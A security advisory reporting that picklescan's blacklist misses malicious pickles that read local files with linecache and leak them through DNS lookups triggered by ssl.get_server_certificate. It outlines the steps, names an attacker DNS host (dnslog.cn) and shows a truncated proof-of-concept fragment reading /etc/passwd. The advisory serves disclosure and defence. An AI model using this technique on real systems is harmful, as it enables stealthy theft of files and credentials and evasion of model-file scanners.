Lack of data validation In picklescan
Description
Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate
Summary
Picklescan does not detect malicious pickles that exfiltrate sensitive information via DNS after deserialization.
Details
picklescan’s blacklist can be bypassed to exfiltrate sensitive information (like file contents, secrets, or credentials) during model deserialization by leveraging ssl.get_server_certificate as the callable function in the pickle payload. Since ssl is a standard Python library used for legitimate TLS operations, it is rarely blacklisted by static scanners or runtime monitors.
The payload avoids flagged modules and instead uses linecache (also unflagged) to read local files. The exfiltrated data is added to DNS-safe chunks, and embedded as subdomains in a crafted FQDN. When passed to ssl.get_server_certificate, the Python runtime performs a DNS resolution to the attacker-controlled domain, leaking the encoded content.
The payload executes the following steps:
Reads sensitive local file content using linecache module
Encodes the data for DNS exfiltration
Constructs a malicious domain name using a third party service dnslog.cn
Triggers a DNS resolution via ssl.get_server_certificate
Leaks the encoded file content to the attacker
PoC
Before running the PoC change the fqdn to your own or a third party that you control. In this PoC we used fqdn = f"{subdomain}.ctmc2q.dnslog.cn".
import numpy as np def create_malicious_model(): # Define the payload class class DNSLogPayload: def __reduce__(self): # Step 1: read a line from /etc/passwd...
Impact
Evade detection: Bypasses the latest version of picklescan's blacklist.
Exfiltrate sensitive local files to an attacker controlled DNS
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | 0.0.25 |
Aliases
References